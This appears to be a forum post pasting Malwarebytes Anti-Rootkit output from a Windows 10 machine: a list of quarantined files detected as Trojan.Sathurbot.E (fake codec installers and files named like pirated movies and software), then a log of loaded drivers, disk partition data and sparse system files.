C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\34b1d5e7d25d48c7630e0ba41d9b301b\KMSpico 10.2.txt (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\358915c23ca7dd8d29c2586bc2f9bb5d\Godzilla Resurgence 2016.avi (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\358915c23ca7dd8d29c2586bc2f9bb5d\Godzilla Resurgence 2016.txt (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\358915c23ca7dd8d29c2586bc2f9bb5d\Ultra XVid Codec Pack.exe (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\37db5be0d4d35939445e87d9d0f890ce\Petes Dragon 2016.avi (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\37db5be0d4d35939445e87d9d0f890ce\Petes Dragon 2016.txt (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\37db5be0d4d35939445e87d9d0f890ce\Ultra XVid Codec Pack.exe (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\4f945ccb2944bc4e607ed26847a5174b\My Blind Brother 2016.avi (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\4f945ccb2944bc4e607ed26847a5174b\My Blind Brother 2016.txt (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\4f945ccb2944bc4e607ed26847a5174b\Ultra XVid Codec Pack.exe (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\4fdbefb5dc0733a6b4dabaaf366227cb\This Is Us [SE01].txt (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\4fdbefb5dc0733a6b4dabaaf366227cb\Ultra XVid Codec Pack.exe (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\4fdbefb5dc0733a6b4dabaaf366227cb\Video.avi (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\51408563b61798158c3c9b122fd24e06\Nuance Dragon NaturallySpeaking 13.exe (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\51408563b61798158c3c9b122fd24e06\Nuance Dragon NaturallySpeaking 13.txt (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\51408563b61798158c3c9b122fd24e06\Setup.dat (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\5fc9283d2e7d46535121d14130ddd344\Batman v Superman Dawn of Justice.avi (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\5fc9283d2e7d46535121d14130ddd344\Batman v Superman Dawn of Justice.txt (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\5fc9283d2e7d46535121d14130ddd344\Ultra XVid Codec Pack.exe (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

 

Physical Sectors Detected: 0

(No malicious items detected)

 

(end)


...and the system log:

 

---------------------------------------

Malwarebytes Anti-Rootkit BETA 1.09.3.1001

 

© Malwarebytes Corporation 2011-2012

 

OS version: 10.0.9200 Windows 10 x64

 

Account is Administrative

 

Internet Explorer version: 11.576.14393.0

 

File system is: NTFS

Disk drives: C:\ DRIVE_FIXED, D:\ DRIVE_FIXED, F:\ DRIVE_FIXED

CPU speed: 2.494000 GHz

Memory total: 8470122496, free: 4025380864

 

Downloaded database version: v2017.03.02.10

Downloaded database version: v2017.02.27.01

Downloaded database version: v2017.02.15.02

Initializing...

======================

------------ Kernel report ------------

     03/02/2017 11:16:27

------------ Loaded modules -----------

\SystemRoot\system32\ntoskrnl.exe

\SystemRoot\system32\hal.dll

\SystemRoot\system32\kd.dll

\SystemRoot\system32\mcupdate_GenuineIntel.dll

\SystemRoot\System32\drivers\werkernel.sys

\SystemRoot\System32\drivers\CLFS.SYS

\SystemRoot\System32\drivers\tm.sys

\SystemRoot\system32\PSHED.dll

\SystemRoot\system32\BOOTVID.dll

\SystemRoot\System32\drivers\FLTMGR.SYS

\SystemRoot\System32\drivers\msrpc.sys

\SystemRoot\System32\drivers\ksecdd.sys

\SystemRoot\System32\drivers\clipsp.sys

\SystemRoot\System32\drivers\cmimcext.sys

\SystemRoot\System32\drivers\ntosext.sys

\SystemRoot\system32\CI.dll

\SystemRoot\System32\drivers\cng.sys

\SystemRoot\system32\drivers\Wdf01000.sys

\SystemRoot\system32\drivers\WDFLDR.SYS

\SystemRoot\System32\Drivers\acpiex.sys

\SystemRoot\System32\Drivers\WppRecorder.sys

\SystemRoot\System32\drivers\ACPI.sys

\SystemRoot\System32\drivers\WMILIB.SYS

\SystemRoot\System32\drivers\intelpep.sys

\SystemRoot\system32\drivers\WindowsTrustedRT.sys

\SystemRoot\System32\drivers\WindowsTrustedRTProxy.sys

\SystemRoot\System32\drivers\pcw.sys

\SystemRoot\System32\drivers\msisadrv.sys

\SystemRoot\System32\drivers\pci.sys

\SystemRoot\System32\drivers\vdrvroot.sys

\SystemRoot\system32\drivers\pdc.sys

\SystemRoot\system32\drivers\CEA.sys

\SystemRoot\System32\drivers\partmgr.sys

\SystemRoot\System32\drivers\spaceport.sys

\SystemRoot\System32\drivers\volmgr.sys

\SystemRoot\System32\drivers\volmgrx.sys

\SystemRoot\System32\drivers\mountmgr.sys

\SystemRoot\System32\drivers\iaStorA.sys

\SystemRoot\System32\drivers\storport.sys

\SystemRoot\System32\drivers\EhStorClass.sys

\SystemRoot\System32\drivers\fileinfo.sys

\SystemRoot\System32\Drivers\Wof.sys

\SystemRoot\system32\drivers\WdFilter.sys

\SystemRoot\system32\drivers\MBAMSwissArmy.sys

\SystemRoot\system32\drivers\CLASSPNP.SYS

\SystemRoot\System32\Drivers\NTFS.sys

\SystemRoot\System32\Drivers\Fs_Rec.sys

\SystemRoot\system32\drivers\ndis.sys

\SystemRoot\system32\drivers\NETIO.SYS

\SystemRoot\System32\Drivers\ksecpkg.sys

\SystemRoot\System32\drivers\tcpip.sys

\SystemRoot\System32\drivers\fwpkclnt.sys

\SystemRoot\System32\drivers\wfplwfs.sys

\SystemRoot\System32\DRIVERS\fvevol.sys

\SystemRoot\System32\drivers\volume.sys

\SystemRoot\System32\drivers\volsnap.sys

\SystemRoot\System32\drivers\rdyboost.sys

\SystemRoot\System32\Drivers\mup.sys

\SystemRoot\system32\drivers\iorate.sys

\SystemRoot\System32\drivers\disk.sys

\SystemRoot\System32\Drivers\crashdmp.sys

\SystemRoot\System32\drivers\cdrom.sys

\SystemRoot\system32\drivers\filecrypt.sys

\SystemRoot\system32\drivers\tbs.sys

\SystemRoot\System32\Drivers\Null.SYS

\SystemRoot\System32\Drivers\Beep.SYS

\SystemRoot\system32\DRIVERS\ctxusbm.sys

\SystemRoot\System32\drivers\BasicDisplay.sys

\SystemRoot\System32\drivers\watchdog.sys

\SystemRoot\System32\drivers\dxgkrnl.sys

\SystemRoot\System32\drivers\BasicRender.sys

\SystemRoot\System32\Drivers\Npfs.SYS

\SystemRoot\System32\Drivers\Msfs.SYS

\SystemRoot\system32\DRIVERS\tdx.sys

\SystemRoot\system32\DRIVERS\TDI.SYS

\SystemRoot\System32\DRIVERS\netbt.sys

\SystemRoot\system32\drivers\afd.sys

\SystemRoot\system32\DRIVERS\VBoxNetAdp6.sys

\SystemRoot\system32\DRIVERS\VBoxNetLwf.sys

\SystemRoot\System32\drivers\vwififlt.sys

\SystemRoot\System32\drivers\pacer.sys

\SystemRoot\system32\drivers\netbios.sys

\SystemRoot\system32\DRIVERS\rdbss.sys

\SystemRoot\system32\DRIVERS\VBoxUSBMon.sys

\SystemRoot\system32\DRIVERS\VBoxDrv.sys

\SystemRoot\system32\drivers\nsiproxy.sys

\SystemRoot\System32\drivers\npsvctrig.sys

\SystemRoot\System32\drivers\mssmbios.sys

\SystemRoot\System32\drivers\gpuenergydrv.sys

\??\C:\WINDOWS\system32\drivers\mbae64.sys

\SystemRoot\System32\Drivers\dfsc.sys

\??\C:\Program Files (x86)\ASUS\ATK Package\ATK WMIACPI\atkwmiacpi64.sys

\SystemRoot\system32\DRIVERS\ahcache.sys

\SystemRoot\System32\DriverStore\FileRepository\compositebus.inf_amd64_a140581a8f8b58b7\CompositeBus.sys

\SystemRoot\System32\drivers\kdnic.sys

\SystemRoot\System32\drivers\umbus.sys

\SystemRoot\system32\DRIVERS\igdkmd64.sys

\SystemRoot\system32\DRIVERS\AiCharger.sys

\SystemRoot\System32\drivers\USBXHCI.SYS

\SystemRoot\system32\drivers\ucx01000.sys

\SystemRoot\System32\drivers\HECIx64.sys

\SystemRoot\System32\drivers\usbehci.sys

\SystemRoot\System32\drivers\USBPORT.SYS

\SystemRoot\System32\drivers\HDAudBus.sys

\SystemRoot\System32\drivers\portcls.sys

\SystemRoot\System32\drivers\drmk.sys

\SystemRoot\System32\drivers\ks.sys

\SystemRoot\System32\drivers\athw8x.sys

\SystemRoot\System32\drivers\vwifibus.sys

\SystemRoot\system32\DRIVERS\RtsBaStor.sys

\SystemRoot\System32\drivers\rt640x64.sys

\SystemRoot\System32\drivers\i8042prt.sys

\SystemRoot\System32\drivers\AsusTP.sys

\SystemRoot\System32\drivers\mouclass.sys

\SystemRoot\System32\drivers\kbfiltr.sys

\SystemRoot\system32\DRIVERS\ETD.sys

\SystemRoot\System32\drivers\kbdclass.sys

\SystemRoot\System32\drivers\CmBatt.sys

\SystemRoot\System32\drivers\BATTC.SYS

\SystemRoot\System32\drivers\intelppm.sys

\SystemRoot\System32\drivers\wmiacpi.sys

\SystemRoot\System32\drivers\AsHIDSwitch64.sys

\SystemRoot\System32\drivers\HIDCLASS.SYS

\SystemRoot\System32\drivers\HIDPARSE.SYS

\SystemRoot\System32\drivers\NdisVirtualBus.sys

\SystemRoot\System32\drivers\swenum.sys

\SystemRoot\System32\drivers\iwdbus.sys

\SystemRoot\System32\drivers\rdpbus.sys

\SystemRoot\System32\drivers\usbhub.sys

\SystemRoot\System32\drivers\USBD.SYS

\SystemRoot\System32\drivers\UsbHub3.sys

\SystemRoot\system32\drivers\RTKVHD64.sys

\SystemRoot\system32\drivers\ksthunk.sys

\SystemRoot\system32\DRIVERS\IntcDAud.sys

\SystemRoot\System32\drivers\usbccgp.sys

\SystemRoot\System32\Drivers\fastfat.SYS

\SystemRoot\System32\drivers\hidusb.sys

\SystemRoot\System32\drivers\kbdhid.sys

\SystemRoot\System32\drivers\mouhid.sys

\SystemRoot\system32\DRIVERS\btfilter.sys

\SystemRoot\System32\drivers\BTHUSB.sys

\SystemRoot\System32\drivers\bthport.sys

\SystemRoot\System32\Drivers\usbvideo.sys

\SystemRoot\System32\Drivers\dump_diskdump.sys

\SystemRoot\System32\Drivers\dump_iaStorA.sys

\SystemRoot\System32\Drivers\dump_dumpfve.sys

\SystemRoot\System32\win32k.sys

\SystemRoot\System32\win32kfull.sys

\SystemRoot\System32\win32kbase.sys

\SystemRoot\System32\drivers\dxgmms1.sys

\SystemRoot\System32\drivers\monitor.sys

\SystemRoot\System32\drivers\dxgmms2.sys

\SystemRoot\System32\TSDDD.dll

\SystemRoot\System32\cdd.dll

\SystemRoot\System32\ATMFD.DLL

\SystemRoot\system32\drivers\WudfPf.sys

\SystemRoot\system32\drivers\wcifs.sys

\SystemRoot\System32\drivers\WUDFRd.sys

\SystemRoot\system32\drivers\luafv.sys

\SystemRoot\system32\drivers\storqosflt.sys

\SystemRoot\System32\drivers\rdpvideominiport.sys

\SystemRoot\system32\drivers\MBAMChameleon.sys

\SystemRoot\system32\drivers\wcnfs.sys

\SystemRoot\System32\drivers\registry.sys

\SystemRoot\System32\drivers\rdpdr.sys

\SystemRoot\system32\drivers\mmcss.sys

\SystemRoot\system32\DRIVERS\bowser.sys

\SystemRoot\system32\DRIVERS\mrxsmb.sys

\SystemRoot\system32\DRIVERS\mrxsmb20.sys

\SystemRoot\system32\drivers\lltdio.sys

\SystemRoot\system32\drivers\mslldp.sys

\SystemRoot\system32\drivers\rspndr.sys

\SystemRoot\System32\DRIVERS\wanarp.sys

\SystemRoot\system32\drivers\ndisuio.sys

\SystemRoot\system32\DRIVERS\nwifi.sys

\??\C:\Program Files (x86)\ASUS\ATK Package\ATKGFNEX\ASMMAP64.sys

\SystemRoot\system32\drivers\HTTP.sys

\SystemRoot\System32\drivers\mpsdrv.sys

\SystemRoot\System32\DRIVERS\srvnet.sys

\SystemRoot\system32\drivers\Ndu.sys

\SystemRoot\system32\DRIVERS\mrxsmb10.sys

\SystemRoot\system32\drivers\peauth.sys

\SystemRoot\System32\drivers\tcpipreg.sys

\SystemRoot\System32\DRIVERS\srv2.sys

\SystemRoot\System32\DRIVERS\srv.sys

\SystemRoot\System32\drivers\vwifimp.sys

\SystemRoot\System32\drivers\condrv.sys

\SystemRoot\system32\Drivers\WdNisDrv.sys

\??\C:\WINDOWS\system32\drivers\mwac.sys

\??\C:\WINDOWS\system32\drivers\mbam.sys

\??\C:\WINDOWS\system32\drivers\farflt.sys

\SystemRoot\system32\drivers\qwavedrv.sys

----------- End -----------

Done!

 

Scan started

Database versions:

  main:    v2017.03.02.10

  rootkit: v2017.02.27.01

 

<<<2>>>

Physical Sector Size: 512

Drive: 0, DevicePointer: 0xffffbe816ccac060, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\disk\

--------- Disk Stack ------

DevicePointer: 0xffffbe816ccacae0, DeviceName: Unknown, DriverName: \Driver\partmgr\

DevicePointer: 0xffffbe816ccac060, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\disk\

DevicePointer: 0xffffbe816b1d6040, DeviceName: Unknown, DriverName: \Driver\ACPI\

DevicePointer: 0xffffbe816b1e3060, DeviceName: \Device\00000032\, DriverName: \Driver\iaStorA\

------------ End ----------

Alternate DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\disk\

Upper DeviceData: 0x0, 0x0, 0x0

Lower DeviceData: 0x0, 0x0, 0x0

<<<3>>>

Volume: C:

File system type: NTFS

SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes

<<<2>>>

<<<3>>>

Volume: C:

File system type: NTFS

SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes

Scanning drivers directory: C:\WINDOWS\SYSTEM32\drivers...

Done!

Drive 0

This is a System drive

Scanning MBR on drive 0...

Inspecting partition table:

This drive is a GPT Drive.

MBR Signature: 55AA

Disk Signature: 9CCC1393

 

GPT Protective MBR Partition information:

 

    Partition 0 type is EFI-GPT (0xee)

    Partition is NOT ACTIVE.

    Partition starts at LBA: 1  Numsec = 4294967295

 

    Partition 1 type is Empty (0x0)

    Partition is NOT ACTIVE.

    Partition starts at LBA: 0  Numsec = 0

 

    Partition 2 type is Empty (0x0)

    Partition is NOT ACTIVE.

    Partition starts at LBA: 0  Numsec = 0

 

    Partition 3 type is Empty (0x0)

    Partition is NOT ACTIVE.

    Partition starts at LBA: 0  Numsec = 0

 

GPT Partition information:

 

    GPT Header Signature 4546492050415254

    GPT Header Revision 65536 Size 92 CRC 4020288429

    GPT Header CurrentLba = 1 BackupLba 1953525167

    GPT Header FirstUsableLba 34  LastUsableLba 1953525134

    GPT Header Guid 75eb052b-50f0-489f-b931-55e4544bf090

    GPT Header Contains 128 partition entries starting at LBA 2

    GPT Header Partition entry size = 128

 

    Backup GPT header Signature 4546492050415254

    Backup GPT header Revision 65536 Size 92 CRC 4020288429

    Backup GPT header CurrentLba = 1953525167 BackupLba 1

    Backup GPT header FirstUsableLba 34  LastUsableLba 1953525134

    Backup GPT header Guid 75eb052b-50f0-489f-b931-55e4544bf090

    Backup GPT header Contains 128 partition entries starting at LBA 1953525135

    Backup GPT header Partition entry size = 128

 

    Partition 0 Type c12a7328-f81f-11d2-ba4b-0a0c93ec93b

    Partition ID d4d081d-f507-48f0-b1fb-b377d1e53ec

    FirstLBA 2048  Last LBA 206847

    Attributes 0

    Partition Name                 EFI system partition

 

    GPT Partition 0 is bootable

    Partition 1 Type de94bba4-6d1-4d40-a16a-bfd5179d6ac

    Partition ID f3cab70-331-408b-bbb2-fd5c1ddea1fa

    FirstLBA 206848  Last LBA 2050047

    Attributes 1

    Partition Name                 Basic data partition

 

    Partition 2 Type e3c9e316-b5c-4db8-817d-f92df0215ae

    Partition ID b1debc94-ca48-46a4-8d78-64e4872494b

    FirstLBA 2050048  Last LBA 2312191

    Attributes 0

    Partition Name         Microsoft reserved partition

 

    Partition 3 Type ebd0a0a2-b9e5-4433-87c0-68b6b72699c7

    Partition ID 54eb870b-a8d-4959-8d3-983ca3f582c

    FirstLBA 2312192  Last LBA 783718399

    Attributes 0

    Partition Name                 Basic data partition

 

    Partition 4 Type ebd0a0a2-b9e5-4433-87c0-68b6b72699c7

    Partition ID 9ec79444-9fd4-4623-a166-7cfa2eebeeb

    FirstLBA 783718400  Last LBA 1499912191

    Attributes 0

    Partition Name                 Basic data partition

 

    Partition 5 Type ebd0a0a2-b9e5-4433-87c0-68b6b72699c7

    Partition ID 2aba36e8-f335-4c4a-a39e-7e67af41923

    FirstLBA 1499912192  Last LBA 1911558143

    Attributes 0

    Partition Name                 Basic data partition

 

    Partition 6 Type de94bba4-6d1-4d40-a16a-bfd5179d6ac

    Partition ID 360d7dea-8f41-41e8-9053-eae964ac9929

    FirstLBA 1911560192  Last LBA 1953523711

    Attributes 1

    Partition Name                 Basic data partition

 

Disk Size: 1000204886016 bytes

Sector size: 512 bytes

 

Done!

File "C:\Windows\System32\KERNELBASE.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\KERNELBASE.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\apphelp.dll" is sparse (flags = 32768)

File "C:\Windows\System32\psapi.dll" is sparse (flags = 32768)

File "C:\Windows\System32\user32.dll" is sparse (flags = 32768)

File "C:\Windows\System32\user32.dll" is sparse (flags = 32768)

File "C:\Windows\System32\win32u.dll" is sparse (flags = 32768)

File "C:\Windows\System32\win32u.dll" is sparse (flags = 32768)

File "C:\Windows\System32\gdi32.dll" is sparse (flags = 32768)

File "C:\Windows\System32\gdi32.dll" is sparse (flags = 32768)

File "C:\Windows\System32\GDI32FULL.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\GDI32FULL.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\advapi32.dll" is sparse (flags = 32768)

File "C:\Windows\System32\msvcrt.dll" is sparse (flags = 32768)

File "C:\Windows\System32\sechost.dll" is sparse (flags = 32768)

File "C:\Windows\System32\rpcrt4.dll" is sparse (flags = 32768)

File "C:\Windows\System32\sspicli.dll" is sparse (flags = 32768)

File "C:\Windows\System32\sspicli.dll" is sparse (flags = 32768)

File "C:\Windows\System32\CRYPTBASE.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\CRYPTBASE.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\BCRYPTPRIMITIVES.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\BCRYPTPRIMITIVES.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\imm32.dll" is sparse (flags = 32768)

File "C:\Windows\System32\shlwapi.dll" is sparse (flags = 32768)

File "C:\Windows\System32\combase.dll" is sparse (flags = 32768)

File "C:\Windows\System32\combase.dll" is sparse (flags = 32768)

File "C:\Windows\System32\ucrtbase.dll" is sparse (flags = 32768)

File "C:\Windows\System32\shell32.dll" is sparse (flags = 32768)

File "C:\Windows\System32\shell32.dll" is sparse (flags = 32768)

File "C:\Windows\System32\cfgmgr32.dll" is sparse (flags = 32768)

File "C:\Windows\System32\WINDOWS.STORAGE.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\WINDOWS.STORAGE.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\powrprof.dll" is sparse (flags = 32768)

File "C:\Windows\System32\KERNEL.APPCORE.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\KERNEL.APPCORE.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\SHCore.dll" is sparse (flags = 32768)

File "C:\Windows\System32\profapi.dll" is sparse (flags = 32768)

File "C:\Windows\System32\ole32.dll" is sparse (flags = 32768)

File "C:\Windows\System32\ole32.dll" is sparse (flags = 32768)

File "C:\Windows\System32\version.dll" is sparse (flags = 32768)

File "C:\Windows\System32\wintrust.dll" is sparse (flags = 32768)

File "C:\Windows\System32\wintrust.dll" is sparse (flags = 32768)

File "C:\Windows\System32\msasn1.dll" is sparse (flags = 32768)

File "C:\Windows\System32\crypt32.dll" is sparse (flags = 32768)

File "C:\Windows\System32\crypt32.dll" is sparse (flags = 32768)

File "C:\Windows\System32\imagehlp.dll" is sparse (flags = 32768)

File "C:\Windows\System32\wininet.dll" is sparse (flags = 32768)

File "C:\Windows\System32\wininet.dll" is sparse (flags = 32768)

File "C:\Windows\System32\netapi32.dll" is sparse (flags = 32768)

File "C:\Windows\System32\userenv.dll" is sparse (flags = 32768)

File "C:\Windows\System32\mpr.dll" is sparse (flags = 32768)

File "C:\Windows\System32\sfc_os.dll" is sparse (flags = 32768)

File "C:\Windows\System32\netutils.dll" is sparse (flags = 32768)

File "C:\Windows\System32\ws2_32.dll" is sparse (flags = 32768)

File "C:\Windows\System32\ws2_32.dll" is sparse (flags = 32768)

File "C:\Windows\System32\comdlg32.dll" is sparse (flags = 32768)

File "C:\Windows\System32\comdlg32.dll" is sparse (flags = 32768)

File "C:\Windows\System32\oleaut32.dll" is sparse (flags = 32768)

File "C:\Windows\System32\oleaut32.dll" is sparse (flags = 32768)

File "C:\Windows\System32\MSVCP_WIN.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\winmm.dll" is sparse (flags = 32768)

File "C:\Windows\System32\winspool.drv" is sparse (flags = 32768)

File "C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.14393.447_none_5507ded2cb4f7f4c\comctl32.dll" is sparse (flags = 32768)

File "C:\Windows\System32\WINMMBASE.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\WINMMBASE.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\bcrypt.dll" is sparse (flags = 32768)

File "C:\Windows\System32\bcrypt.dll" is sparse (flags = 32768)

File "C:\Windows\System32\cryptsp.dll" is sparse (flags = 32768)

File "C:\Windows\System32\rsaenh.dll" is sparse (flags = 32768)

File "C:\Windows\System32\wkscli.dll" is sparse (flags = 32768)

File "C:\Windows\System32\cscapi.dll" is sparse (flags = 32768)

File "C:\Windows\System32\uxtheme.dll" is sparse (flags = 32768)

File "C:\Windows\System32\iertutil.dll" is sparse (flags = 32768)

File "C:\Windows\System32\iertutil.dll" is sparse (flags = 32768)

File "C:\Windows\System32\ONDEMANDCONNROUTEHELPER.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\ONDEMANDCONNROUTEHELPER.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\IPHLPAPI.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\winhttp.dll" is sparse (flags = 32768)

File "C:\Windows\System32\mswsock.dll" is sparse (flags = 32768)

File "C:\Windows\System32\nsi.dll" is sparse (flags = 32768)

File "C:\Windows\System32\winnsi.dll" is sparse (flags = 32768)

File "C:\Windows\System32\dnsapi.dll" is sparse (flags = 32768)

File "C:\Windows\System32\dnsapi.dll" is sparse (flags = 32768)

File "C:\Windows\System32\urlmon.dll" is sparse (flags = 32768)

File "C:\Windows\System32\urlmon.dll" is sparse (flags = 32768)

File "C:\Windows\System32\rasadhlp.dll" is sparse (flags = 32768)

File "C:\Windows\System32\FWPUCLNT.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\msctf.dll" is sparse (flags = 32768)

File "C:\Windows\System32\msctf.dll" is sparse (flags = 32768)

File "C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\tiptsf.dll" is sparse (flags = 32768)

File "C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\tiptsf.dll" is sparse (flags = 32768)

File "C:\Windows\System32\dwmapi.dll" is sparse (flags = 32768)

File "C:\Windows\System32\dwmapi.dll" is sparse (flags = 32768)

File "C:\Windows\System32\dhcpcsvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\dhcpcsvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\ntmarta.dll" is sparse (flags = 32768)

File "C:\Windows\System32\clbcatq.dll" is sparse (flags = 32768)

File "C:\Windows\System32\UIAUTOMATIONCORE.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\UIAUTOMATIONCORE.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\sxs.dll" is sparse (flags = 32768)

File "C:\Windows\System32\oleacc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\oleacc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\twinapi.dll" is sparse (flags = 32768)

File "C:\Windows\System32\TWINAPI.APPCORE.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\TWINAPI.APPCORE.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\wtsapi32.dll" is sparse (flags = 32768)

File "C:\Windows\System32\winsta.dll" is sparse (flags = 32768)

File "C:\Windows\System32\propsys.dll" is sparse (flags = 32768)

File "C:\Windows\System32\coml2.dll" is sparse (flags = 32768)

File "C:\Windows\System32\mssprxy.dll" is sparse (flags = 32768)

File "C:\Windows\System32\linkinfo.dll" is sparse (flags = 32768)

File "C:\Windows\System32\ntshrui.dll" is sparse (flags = 32768)

File "C:\Windows\System32\srvcli.dll" is sparse (flags = 32768)

File "C:\Windows\System32\smss.exe" is sparse (flags = 32768)

File "C:\Windows\System32\csrss.exe" is sparse (flags = 32768)

File "C:\Windows\System32\wininit.exe" is sparse (flags = 32768)

File "C:\Windows\System32\winlogon.exe" is sparse (flags = 32768)

File "C:\Windows\System32\winlogon.exe" is sparse (flags = 32768)

File "C:\Windows\System32\services.exe" is sparse (flags = 32768)

File "C:\Windows\System32\services.exe" is sparse (flags = 32768)

File "C:\Windows\System32\lsass.exe" is sparse (flags = 32768)

File "C:\Windows\System32\lsass.exe" is sparse (flags = 32768)

File "C:\Windows\System32\svchost.exe" is sparse (flags = 32768)

File "C:\Windows\System32\dwm.exe" is sparse (flags = 32768)

File "C:\Windows\System32\WUDFHost.exe" is sparse (flags = 32768)

File "C:\Windows\System32\setupapi.dll" is sparse (flags = 32768)

File "C:\Windows\System32\devobj.dll" is sparse (flags = 32768)

File "C:\Windows\System32\spoolsv.exe" is sparse (flags = 32768)

File "C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9247_none_5090cb78bcba4a35\msvcr90.dll" is sparse (flags = 32768)

File "C:\Windows\System32\msi.dll" is sparse (flags = 32768)

File "C:\Windows\System32\mscoree.dll" is sparse (flags = 32768)

File "C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll" is sparse (flags = 32768)

File "C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll" is sparse (flags = 32768)

File "C:\Windows\System32\MSVCR120_CLR0400.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\MSVCR120_CLR0400.DLL" is sparse (flags = 32768)

File "C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\40571abae9422cd2ca6fafbbde1c3cdc\mscorlib.ni.dll" is sparse (flags = 32768)

File "C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll" is sparse (flags = 32768)

File "C:\Windows\assembly\NativeImages_v4.0.30319_32\System\08da6b6698b412866e6910ae9b84f363\System.ni.dll" is sparse (flags = 32768)

File "C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78#\010ca03bc4ce0e90aba17cf53dfaa3b0\System.ServiceProcess.ni.dll" is sparse (flags = 32768)

File "C:\Windows\System32\winusb.dll" is sparse (flags = 32768)

File "C:\Windows\System32\fundisc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\xmllite.dll" is sparse (flags = 32768)

File "C:\Windows\System32\fdPnp.dll" is sparse (flags = 32768)

File "C:\Windows\System32\atl.dll" is sparse (flags = 32768)

File "C:\Windows\System32\wshqos.dll" is sparse (flags = 32768)

File "C:\Windows\System32\WSHTCPIP.DLL" is sparse (flags = 32768)

